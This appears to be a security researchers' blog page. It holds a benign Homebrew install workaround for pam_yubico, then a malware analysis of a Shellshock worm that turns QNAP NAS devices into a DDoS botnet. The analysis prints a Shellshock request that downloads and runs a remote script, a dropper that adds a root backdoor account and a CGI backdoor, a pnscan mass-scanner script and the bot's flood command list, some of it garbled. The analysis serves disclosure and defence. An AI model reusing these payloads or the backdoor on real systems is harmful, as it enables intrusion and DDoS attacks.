Workaround for brew install “pam_yubico” in MAC OS X 10.11 El Capitan

Workaround for brew install “pam_yubico” in MAC OS X 10.11 El Capitan

Step by-step guide.

1.Find the downloaded archive file in /Library/Caches/Homebrew/pam_yubico-2.19.tar.gz

2.Extract the archive and “cd yubico-pam-2.19

3.Edit the file “” and change line no:77 and 80 with the following lines:
line 77: $(A2X) –format=manpage –no-xmllint -a revdate=”Version $(VERSION)” $<
line 80: $(A2X) –format=manpage –no-xmllint -a revdate=”Version $(VERSION)” $< the following command inside the folder “yubico-pam-2.19”

autoreconf -fvi

./configure –prefix=/usr/local/Cellar/pam_yubico/2.19 –with-libyubikey-prefix=/usr/local/opt/libyubikey –with-libykclient-prefix=/usr/loc

make install

5.verify with “brew list” that installation is successfully.

copy the file “” to “/usr/local/lib
7.Follow the guide here :

Credits to for the “–no-xmllint ” hint.

For more details contact me at


Armed Qnap-NAS Botnet Revealed

Armed Qnap-NAS Botnet Revealed

In addition of this analyses.

Worm Backdoors and Secures QNAP Network Storage Devices

Shellshock Worm Exploiting Unpatched QNAP NAS Devices

A little ShellShock fun

This is what we found.

Like always our publication is short but right into point.

The attackers are sending a GET request with Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from Internet, this payload contains a SH script with very clever design logic specially build for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point the attacker is building persistence with script inside the compromised NAS device.

Another interesting founding is that attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this attacker prevents other hackers to own the already hacked NAS device.

Adding a “’request” user with root privileges into he “passwd” and “shadow” file is classical approach to own a Linux machine. The real aim of this massive hack is, at the script “armgH.cgi” that attacker is downloading and installing into the compromised machine.

This CGI Backdoor ready NAS becomes an armed device ready for DDOS.The whole attack schematic is design to be continuous with auto pilot mode.

So far we managed to detect more than 500+ compromised devices.

Screen Shot 2014-12-17 at 09.47.43-> Massive Attack -> Deploying Payload -> Patching against Shellshock (persistence) -> Arming -> Deploy the scanner ->


Attack Exploit in the wild.

GET /cgi-bin/authLogin.cgi HTTP/1.1Host: () { :; }; /bin/rm -rf /tmp/ && /bin/mkdir -p /share/HDB_DATA/…/php && /usr/bin/wget -c http://xxx.14.xx.79/ /tmp && /bin/sh /tmp/ 0<&1 2>&1500HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length:2250Date: Sat, 13 Dec 2014 22:09:42 GMTServer: header”>HTTP Status 404 – /cgi-bin/authLogin.cgi

Payload – Hosted in compromise server!

#!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY os=`uname -m` -P /tmp/ ; cd /tmp/ ;chmod +x ; sh # # fold=/share/MD0_DATA/optware/.xpl/ if [[ “$os” == ‘armv5tel’ ]]; thenwget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi sleep 1 Search=”request”Files=”/etc/passwd” if grep $Search $Files; then   

echo “$Search userits just added!”else          

echo “request:x:0:0:request:/share/homes/admin:/bin/sh” >> /etc/passwdecho ‘request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7::: >> /etc/shadow#inst patch

wget -P /mnt/HDA_ROOT/update_pkg/

#inst scan

sfolder=”/share/HDB_DATA/…/” url69=http://xx.xx.xx.79/run


 Arming the NAS devices for DDOS attacks.

Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability.

Output from – Reverse engineering analyses.

PRIVMSG %s :* .exec – execute a system commandPRIVMSG %s :* .version – show the current version of botPRIVMSG %s :* .status – show the status of botPRIVMSG %s :* .help – show this help messagePRIVMSG %s :* *** Scan CommandsPRIVMSG %s :* .advscan – scan with user:pass (A.B) classes sets by youPRIVMSG %s :* .advscan – scan with d-link config reset bugPRIVMSG %s :* .advscan->recursive – scan local ip range with user:pass, (C.D) classes randomPRIVMSG %s :* .advscan->recursive – scan local ip range with d-link config reset bugPRIVMSG %s :* .advscan->random – scan random ip range with user:pass, (A.B) classes randomPRIVMSG %s :* .advscan->random – scan random ip range with d-link config reset bugPRIVMSG %s :* .advscan->random->b – scan local ip range with user:pass, A.(B) class randomPRIVMSG %s :* .advscan->random->b – scan local ip range with d-link config reset bugPRIVMSG %s :* .stop – stop current operation (scan/dos)PRIVMSG %s :* *** DDos Commands:PRIVMSG %s :* NOTE: to 0 = random ports, to 0 = random spoofing,PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secsPRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86PRIVMSG %s :* .spoof – set the source address ip spoofPRIVMSG %s :* .synflood – tcp syn flooderPRIVMSG %s :* .ngsynflood – tcp ngsyn flooder (new generation)PRIVMSG %s :* .ackflood <host> <port> <secs> – tcp ack flooderPRIVMSG %s :* .ngackflood – tcp ngack flooder (new generation)PRIVMSG %s :* *** IRC Commands:PRIVMSG %s :* .setchan – set new master channelPRIVMSG %s :* .join – join bot in selected roomPRIVMSG %s :* .part – part bot from selected roomPRIVMSG %s :* .quit – kill the current process

Screenshot from hacked NAS device with deployed payload can be controlled via CGI web backdoor



 Mass scanner for Shellshock

This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded port scanner to search and hack for other vulnerable Qnap NAS devices.

#!/bin/sh## xXx@code 3-12-2014rand=`echo $((RANDOM%255+2))`#url=””url=”http://xxx.14.xx.xx/; download=”/bin/rm-rf /tmp/ && /bin/mkdir-p /share/HDB_DATA/…/php && /usr/bin/wget-c $url-P /tmp && /bin/sh /tmp/ 0<&1 2>&1 nnn”get=”GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: () { :; }; $download nnn” ./pnscan -rQDoc   -w”$get “-t500 -n300 $rand.0.0.0: 8080 > /dev/null &

Senad Aruch

Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Currently holding a Senior Lead position.


Davide Cioccia

MSc Computer Engineering Degree. Security Developer focused on Cyber Security Intelligence, Malware analysis, Anti-fraud systems. Microsoft certified. Currently holding a Security Consultant position.




“CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware’s control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware’s operators, for a significantly higher price in Bitcoin”(Wikipedia)

Davide Cioccia & Senad Aruch



Are 2 factor authentications enough to protect your money?

During our recent analysis of malware targeting financial institution we found a very powerful that can bypass the 2FA (Two factor-authentication) with a malicious app installed on the phone. Malware like this can drive the user to download the fake application on the phone, using a MITB (Man in the browser attack). Once the user PC the attacker can take full control of the machine and interact with him through a C&C server. What we explain in this article is a real active botnet with at least 40-compromised zombie host.

Research Download Link —-> Are 2 factor authentications enough to protect your money?

Kins origin malware with unique ATSEngine.

Uncovering a C&C server used by hackers to control the infected victims. The malware analyses done on victim’s machines reveals that malware from KINS family is targeting specific Italian bank users with ATSEngine, with capability to dynamic inject a code in the victims browser and managing the “drops” in full automatic way. The attack campaign is ongoing right now and we recovered hacked accounts. Beside that we reveal the “drops” used to collect the stolen money from the customers.

Continue reading “Kins origin malware with unique ATSEngine.”

Botnet With 5GB Of Hacked Data

This hostname “” is where we revealed a 5.GB of personal data hacked from ITALIAN users. The hostname is a C&C Center for a private botnet with capability to control the infected machines “zombies”. The main function of this malware is “key logger” and “screenshots” capture based on “BANK” and “BANCA” keyword detection. The backend was password protected and all the logs hacked data was encrypted. The malware was capable to receive live commands from the C&C center. The command list that we analysed was focused on info stealing-login details for bank accounts.

This research is also published at ABILab report.

Bollettino ABILab CommValley Aprile 2014


Continue reading “Botnet With 5GB Of Hacked Data”

Blog at

Up ↑